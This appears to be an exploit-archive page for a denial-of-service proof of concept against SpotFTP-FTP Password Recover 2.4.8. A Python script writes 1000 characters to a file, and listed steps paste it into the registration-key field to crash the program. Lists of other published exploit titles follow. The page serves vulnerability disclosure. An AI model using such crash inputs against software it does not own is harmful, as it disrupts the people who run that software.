"SpotFTP-FTP Password Recover 2.4.8 - Denial of Service (PoC)"

Author

Exploit author

"Ismael Nava"

Platform

Exploit platform

windows

Release date

Exploit published date

2020-02-25

Download file

# Exploit Title: SpotFTP-FTP Password Recover 2.4.8 - Denial of Service (PoC)
# Date: 2020-24-02
# Exploit Author: Ismael Nava
# Vendor Homepage: http://www.nsauditor.com/
# Software Link: http://www.nsauditor.com/spotftp.html
# Version: 2.4.8
# Tested on: Windows 10 Home x64
# CVE : n/a

#STEPS
# Open the program SpotFTP-FTP Password Recover
# Run the python exploit script, it will create a new .txt files
# Copy the content of the file "RandomLetter.txt"
# Click in the  Enter Registration Code
# In the field Key put the content of the file "RandomLetter.txt"
# End :)

buffer = 'Z' * 1000

try: 
    file = open("RandomLetter.txt","w")
    file.write(buffer)
    file.close()

    print("Archive ready")
except:
    print("Archive no ready")

Release Date	Title	Type	Platform	Author
2020-07-13	"Park Ticketing Management System 1.0 - 'viewid' SQL Injection"	webapps	php	gh1mau
2020-07-13	"Park Ticketing Management System 1.0 - Authentication Bypass"	webapps	php	gh1mau
2020-07-10	"Barangay Management System 1.0 - Authentication Bypass"	webapps	php	BKpatron
2020-07-10	"Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution"	remote	linux	SpicyItalian
2020-07-10	"HelloWeb 2.0 - Arbitrary File Download"	webapps	asp	bRpsd
2020-07-09	"Wordpress Plugin Powie's WHOIS Domain Check 0.9.31 - Persistent Cross-Site Scripting"	webapps	php	mqt
2020-07-09	"Savsoft Quiz 5 - Persistent Cross-Site Scripting"	webapps	php	th3d1gger
2020-07-09	"FrootVPN 4.8 - 'frootvpn' Unquoted Service Path"	local	windows	v3n0m
2020-07-08	"SuperMicro IPMI 03.40 - Cross-Site Request Forgery (Add Admin)"	webapps	hardware	"Metin Yunus Kandemir"
2020-07-08	"BSA Radar 1.6.7234.24750 - Cross-Site Request Forgery (Change Password)"	webapps	hardware	"William Summerhill"

Release Date	Title	Type	Platform	Author
2020-07-09	"FrootVPN 4.8 - 'frootvpn' Unquoted Service Path"	local	windows	v3n0m
2020-07-06	"Fire Web Server 0.1 - Remote Denial of Service (PoC)"	dos	windows	"Saeed reza Zamanian"
2020-07-01	"RM Downloader 2.50.60 2006.06.23 - 'Load' Local Buffer Overflow (EggHunter) (SEH) (PoC)"	local	windows	"Paras Bhatia"
2020-06-26	"KiteService 1.2020.618.0 - Unquoted Service Path"	local	windows	"Marcos Antonio León"
2020-06-26	"Windscribe 1.83 - 'WindscribeService' Unquoted Service Path"	local	windows	"Ethan Seow"
2020-06-23	"Code Blocks 20.03 - Denial Of Service (PoC)"	dos	windows	"Paras Bhatia"
2020-06-23	"Lansweeper 7.2 - Incorrect Access Control"	local	windows	"Amel BOUZIANE-LEBLOND"
2020-06-22	"Frigate 2.02 - Denial Of Service (PoC)"	dos	windows	"Paras Bhatia"
2020-06-17	"Code Blocks 17.12 - 'File Name' Local Buffer Overflow (Unicode) (SEH) (PoC)"	local	windows	"Paras Bhatia"
2020-06-16	"Bandwidth Monitor 3.9 - 'Svc10StrikeBandMontitor' Unquoted Service Path"	local	windows	boku

Release Date	Title	Type	Platform	Author
2020-02-26	"Core FTP LE 2.2 - Denial of Service (PoC)"	dos	windows	"Ismael Nava"
2020-02-25	"SpotFTP-FTP Password Recover 2.4.8 - Denial of Service (PoC)"	dos	windows	"Ismael Nava"
2020-02-25	"aSc TimeTables 2020.11.4 - Denial of Service (PoC)"	dos	windows	"Ismael Nava"
2018-11-12	"CuteFTP 9.3.0.3 - Denial of Service (PoC)"	dos	windows_x86-64	"Ismael Nava"

import requests

response = requests.get('https://www.nmmapper.com/api/exploitdetails/48132/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Search for hundreds of thousands of exploits

"SpotFTP-FTP Password Recover 2.4.8 - Denial of Service (PoC)"

Download file

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.